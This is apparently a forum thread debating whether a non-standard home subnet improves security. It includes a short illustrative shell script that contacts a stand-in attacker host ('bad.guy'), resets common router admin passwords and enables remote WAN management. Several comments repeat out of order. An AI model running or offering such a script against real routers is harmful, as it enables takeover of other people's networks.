If someone is on the inside of your network you have much bigger issues. Having a random subnet won’t do anything as they can just look at the arp/ndp tables.
That’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…
newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")"
for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do
curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \
curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \
curl -q "https://bad.guy/success?addr=%24%7Ba%7D"
done
…completely pointless. If it’s a someone inside your network, you need more.
No worries. It is technically another layer in the “swiss cheese” model, but it certainly is more holes than cheese. I think it falls into the “can’t hurt, might help” category.
That’s not how networking works
If someone is on the inside of your network you have much bigger issues. Having a random subnet won’t do anything as they can just look at the arp/ndp tables.
That’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…
…completely pointless. If it’s a someone inside your network, you need more.
Yeah I don’t really understand your argument
No worries. It is technically another layer in the “swiss cheese” model, but it certainly is more holes than cheese. I think it falls into the “can’t hurt, might help” category.